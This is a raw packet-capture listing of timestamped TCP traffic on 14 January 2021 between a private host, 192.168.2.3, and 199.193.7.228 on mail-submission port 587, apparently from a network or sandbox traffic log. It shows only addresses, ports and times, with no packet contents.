Jan 14, 2021 08:01:08.477194071 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.477258921 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.477343082 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.477468014 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.521140099 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.521194935 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.521246910 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.521271944 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.521421909 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.521609068 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.522305965 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.593108892 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.593168974 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.594222069 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.594839096 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.595237970 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.595501900 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.595813990 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.596092939 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.596407890 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.621289015 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.621330023 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.621359110 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.621417046 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.621471882 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.667382956 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.667427063 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.667532921 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.667608023 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.667673111 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.667876005 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.667903900 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.667977095 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.668009996 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.711934090 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.712007046 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.712124109 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.712184906 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.712187052 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.712307930 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.712338924 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.712372065 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.712460041 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.712620020 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.712696075 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.712802887 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.713057995 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.784606934 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.784804106 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.788290024 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.789195061 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.789273024 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.789330006 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.789362907 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.789449930 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.789486885 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.789494038 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.789515972 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.789573908 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.789597988 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.789630890 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.811708927 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.811948061 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.812072039 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.859348059 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.859611988 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.859641075 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.859667063 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.859771013 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.859823942 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.859894037 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.902909040 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.902957916 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.902983904 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.903008938 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.903033972 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.903069973 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.903127909 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.903280020 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.903326035 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.903356075 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.903356075 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.903512955 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.904350042 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.976874113 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.977183104 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.977209091 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.981512070 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.981528997 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.981535912 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.981750965 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.004611969 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.004631996 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.004900932 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.005001068 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.050003052 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.050211906 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.050226927 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.050395966 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.050518036 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.050529957 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.050599098 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.050632954 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.093463898 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.093568087 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.093734026 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.093746901 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.093803883 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.093838930 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.093955994 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.093969107 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.093980074 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.094006062 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.094046116 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.094175100 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.094274998 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.094413996 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.094520092 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.094630003 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.094643116 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.094685078 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.169303894 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.169559002 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.169703007 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.173676014 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.173692942 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.173701048 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.173708916 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.175944090 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.175997019 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.195285082 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.195307970 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.195317030 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.195327997 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.195538998 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.195611000 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.241514921 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.241537094 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.241544008 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.241559029 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.241657972 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.241714954 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.244530916 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.245984077 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.283694029 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.283804893 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.283833027 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.283899069 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.284097910 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.284126997 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.284194946 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.284198999 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.284230947 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.284264088 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.284621000 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.284647942 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.284672022 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.284693003 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.284724951 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.284738064 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.359903097 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.359987974 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.360061884 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.360102892 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.366369009 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.366384029 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.366419077 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.366565943 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.366624117 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.366633892 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.366657972 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.366669893 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.366677046 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.366691113 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.366874933 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.367070913 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.367230892 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.367538929 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.367774963 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.367933989 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.368098021 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.368236065 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.368360043 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.368489027 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.385755062 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.385790110 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.385850906 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.385926008 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.431994915 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.432032108 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.432054043 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.432166100 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.432297945 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.432363987 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.434376955 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.435370922 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.435528994 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.436444044 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.436615944 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.474332094 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.474376917 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.474397898 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.474415064 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.474646091 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.474699974 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.474836111 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.474931955 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.474956036 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.474982977 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.475034952 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.475605011 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.550626993 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.550659895 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.550672054 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.557003021 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.557574987 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.557595968 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.557604074 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.557743073 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.557760000 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.558259010 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.558274984 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.558949947 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.574474096 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.574690104 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.575979948 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.576045036 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.576133013 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.576219082 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.576237917 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.622488022 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.622519016 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.622582912 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.622675896 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.622690916 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.622840881 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.622919083 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.622926950 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.622988939 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.623054028 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.623155117 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.624423027 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.630564928 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.631012917 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.664880037 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.664952040 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.665159941 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.665431023 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.665505886 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.665525913 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.665572882 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.665997028 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.666073084 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.666085005 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.666099072 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.666131973 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.666188002 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.666729927 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.666783094 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.666829109 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.666853905 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.766127110 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.766222954 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.766241074 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.766290903 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.766326904 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.766494036 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.766545057 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.813821077 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.813879967 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.813915014 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.814058065 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.814138889 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.814435005 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.814483881 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.814543009 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.814608097 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.821136951 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.821367979 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.821949959 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.855283022 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.855326891 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.855515003 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.855525970 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.855566025 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.855606079 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.856051922 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.856123924 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.856132030 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.856169939 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.856214046 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.856240988 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.856508970 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.856770039 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.856836081 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.856852055 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.856918097 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.956309080 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.956337929 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.956423998 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:09.956522942 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:09.956583023 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.004417896 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.004487991 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.004671097 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.004707098 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.004813910 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.004964113 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.005064964 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.005067110 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.005160093 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.005170107 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.005227089 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.012123108 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.012911081 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.045617104 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.045636892 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.045644999 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.045861959 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.045979977 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.046063900 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.046257019 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.046279907 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.046336889 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.046355963 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.046389103 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.046421051 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.046468973 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.046534061 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.046830893 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.046905041 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.046914101 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.046989918 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.047076941 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.047141075 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.146693945 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.146732092 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.146900892 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.146997929 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.147070885 CET	49788	587	192.168.2.3	199.193.7.228
